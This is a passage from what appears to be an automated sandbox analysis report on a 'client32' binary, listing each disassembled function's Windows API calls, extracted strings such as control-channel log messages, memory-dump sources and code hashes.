                                                                                                                                                                • Opcode Fuzzy Hash: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                                                                                • Instruction Fuzzy Hash: AF31E475B04609ABC324CFA5DC95FE7B3E5BB88718F10862CF56A976D0DA34B840CB54
                                                                                                                                                                Function 11039400 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 11039435
                                                                                                                                                                • GetClassNameA.USER32(00000000,?,00000040), ref: 1103945B
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 110394E8
                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1103950B
                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,?), ref: 11039524
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ClassItemNamePointsRect_malloc_memsetwsprintf
                                                                                                                                                                • String ID: edit
                                                                                                                                                                • API String ID: 2434965487-2167791130
                                                                                                                                                                • Opcode ID: b9f8c25bce05456a1ac1130d92197645ea9678c6f58a168908617c2ae6c35c02
                                                                                                                                                                • Instruction ID: 94acfc0917b3b9f4953dcedb551f98c3703ae943f2dcdee60a79eb2a958a1b92
                                                                                                                                                                • Opcode Fuzzy Hash: b9f8c25bce05456a1ac1130d92197645ea9678c6f58a168908617c2ae6c35c02
                                                                                                                                                                • Instruction Fuzzy Hash: CE417E75A0060A9FD714CFA4CD84FAFF7B9FB84319F008519EA6697384EB74A904CB50
                                                                                                                                                                Function 11137070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _malloc.LIBCMT ref: 111370A6
                                                                                                                                                                • _free.LIBCMT ref: 111370DD
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • _free.LIBCMT ref: 1113716D
                                                                                                                                                                  • Part of subcall function 1110F270: InterlockedDecrement.KERNEL32(?), ref: 1110F278
                                                                                                                                                                • _free.LIBCMT ref: 1113713E
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$DecrementErrorFreeHeapInterlockedLast__wcstoi64_malloc
                                                                                                                                                                • String ID: *HelpReqServer$Client
                                                                                                                                                                • API String ID: 1390041139-3616015116
                                                                                                                                                                • Opcode ID: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                                                                                • Instruction ID: 8e3468a70864abf3cc9909560d123acfb2a7f2167445c6f0ed38d11247114e31
                                                                                                                                                                • Opcode Fuzzy Hash: 71aa43b1dfc4152375353722706e6e213d6d63b076ebc57cc88b85f2b8b4d0b4
                                                                                                                                                                • Instruction Fuzzy Hash: 6B313877B001156BDB00DE58DC81BAEF3A9EF88325F154169ED04AB380D675F904C7D5
                                                                                                                                                                Function 110DD680 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 103COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110D8200: __CxxThrowException@8.LIBCMT ref: 110D8283
                                                                                                                                                                  • Part of subcall function 110D8200: gethostbyname.WSOCK32(0.0.0.0,59FD48C0,?,?,00000000), ref: 110D8295
                                                                                                                                                                  • Part of subcall function 110D8200: WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11186BEB), ref: 110D82A1
                                                                                                                                                                  • Part of subcall function 110D8200: _memmove.LIBCMT ref: 110D82CB
                                                                                                                                                                  • Part of subcall function 110D8200: htons.WSOCK32(00000000), ref: 110D82F1
                                                                                                                                                                  • Part of subcall function 110D8200: socket.WSOCK32(00000002,00000001,00000000), ref: 110D8305
                                                                                                                                                                  • Part of subcall function 110D8200: WSAGetLastError.WSOCK32 ref: 110D8313
                                                                                                                                                                • OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)...,?,00000000,?,?,00000000), ref: 110DD708
                                                                                                                                                                  • Part of subcall function 110DE840: EnterCriticalSection.KERNEL32(111ED0A4,110185F8,59FD48C0,?,?,?,111CC6F8,11186998,000000FF,?,1101A642), ref: 110DE841
                                                                                                                                                                Strings
                                                                                                                                                                • NsAppSystem Info : Stopped Listening On Control Channel For Connections..., xrefs: 110DD6F6
                                                                                                                                                                • NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)..., xrefs: 110DD703
                                                                                                                                                                • NsAppSystem Info : Control Channel Connected To NsStudent App..., xrefs: 110DD7BA
                                                                                                                                                                • NsAppSystem Info : INCOMING Control Channel Connection..., xrefs: 110DD72C
                                                                                                                                                                • NsAppSystem Info : Control Channel Listening for Connections..., xrefs: 110DD6B6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$CriticalDebugEnterException@8OutputSectionStringThrow_memmovegethostbynamehtonssocket
                                                                                                                                                                • String ID: NsAppSystem Info : Control Channel Connected To NsStudent App...$NsAppSystem Info : Control Channel Listening for Connections...$NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)...$NsAppSystem Info : INCOMING Control Channel Connection...$NsAppSystem Info : Stopped Listening On Control Channel For Connections...
                                                                                                                                                                • API String ID: 2962855875-3381136194
                                                                                                                                                                • Opcode ID: 1b7ecb99bb46378956ba7eb88822c28ef9798db93cd3f111b1ffcc2a005beac2
                                                                                                                                                                • Instruction ID: fd97f17cd70541077184d2754658eb2bb5ea6376c841969094cbb9e24a52883a
                                                                                                                                                                • Opcode Fuzzy Hash: 1b7ecb99bb46378956ba7eb88822c28ef9798db93cd3f111b1ffcc2a005beac2
                                                                                                                                                                • Instruction Fuzzy Hash: 7C31A0B5E003869FDF00DFA89994B9EFBA1FB44708F144569D51597280EA716A04CB92
                                                                                                                                                                Function 110ED430 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED481
                                                                                                                                                                • _free.LIBCMT ref: 110ED49C
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _malloc.LIBCMT ref: 110ED4AE
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED4DA
                                                                                                                                                                • _free.LIBCMT ref: 110ED563
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                                                                                                • String ID: Error %d getting %s
                                                                                                                                                                • API String ID: 582965682-2709163689
                                                                                                                                                                • Opcode ID: 21b90e269bb058007468a2708e5de79ddeb75680d954529505c3fa37c1052212
                                                                                                                                                                • Instruction ID: cd42bc0bb861def8ff6dbc914e14b6928e4a225feda89385fcf4a9bb75652b77
                                                                                                                                                                • Opcode Fuzzy Hash: 21b90e269bb058007468a2708e5de79ddeb75680d954529505c3fa37c1052212
                                                                                                                                                                • Instruction Fuzzy Hash: 58315076D001289BDB60DA19CC84BEEB7F9FF94344F0480E9E899A7240DE716E85CF91
                                                                                                                                                                Function 11143360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                                                                                                  • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                                                                                • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 11143427
                                                                                                                                                                • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                                                                                                • String ID: 1000,50
                                                                                                                                                                • API String ID: 3904670044-1941404556
                                                                                                                                                                • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                                                                                • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                                                                                                • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                                                                                • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                                                                                                Function 110612F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: ..\CTL32\configplus.cpp$result <= buflen
                                                                                                                                                                • API String ID: 2111968516-413741496
                                                                                                                                                                • Opcode ID: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                                                                                                • Instruction ID: 66cd83cde6406eed73dadf9a29febb3e9e016d9ffe8428f4573ae4edc325b04e
                                                                                                                                                                • Opcode Fuzzy Hash: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                                                                                                • Instruction Fuzzy Hash: 8E21DB75E041669BC301CF389C84DEE77ED9FC5369B14C251FDA69B685E631E904C390
                                                                                                                                                                Function 110594C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,77602AF0,00000001,000000C8,11059995,?,?,00000000,?,?), ref: 11059518
                                                                                                                                                                • timeGetTime.WINMM ref: 1105954B
                                                                                                                                                                  • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 11059594
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1105959B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSectionwsprintf$EnterErrorEventExitLastLeaveMessageProcessTime_malloc_memset_strncpytime
                                                                                                                                                                • String ID: CltReconn.cpp$gMain.pReconnThread
                                                                                                                                                                • API String ID: 3397837340-2390197369
                                                                                                                                                                • Opcode ID: 62f0ce4501407474e94ae8187d1c8e7f68287c587de99165efd95a88e45b781b
                                                                                                                                                                • Instruction ID: d55008317b7f58e9c03502da526e59385c1a25d3ba89ff1204f814874157006d
                                                                                                                                                                • Opcode Fuzzy Hash: 62f0ce4501407474e94ae8187d1c8e7f68287c587de99165efd95a88e45b781b
                                                                                                                                                                • Instruction Fuzzy Hash: 853182B6E04319DFD750CFA8D880B9AFBF4FB48708F10456AE925D7240E774AA40CB91
                                                                                                                                                                Function 1109D650 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(?), ref: 1109D66F
                                                                                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 1109D680
                                                                                                                                                                • FindWindowA.USER32(?,00000000), ref: 1109D6C1
                                                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109E8E9,000001F4,00000006,?,11066C00,0000048C,00000001), ref: 1109D6DC
                                                                                                                                                                • FindWindowA.USER32(?,00000000), ref: 1109D6ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Find$ClassNameSleep
                                                                                                                                                                • String ID: gfff
                                                                                                                                                                • API String ID: 1867012073-1553575800
                                                                                                                                                                • Opcode ID: f63e749aaae1211fd170dac7924bfa73fc6692fe634daa17492b9abf550c62c7
                                                                                                                                                                • Instruction ID: 4d297b605abb8e027e0f0f99cc6afa5b4bd528ddbd813a0f77330fab7f22680d
                                                                                                                                                                • Opcode Fuzzy Hash: f63e749aaae1211fd170dac7924bfa73fc6692fe634daa17492b9abf550c62c7
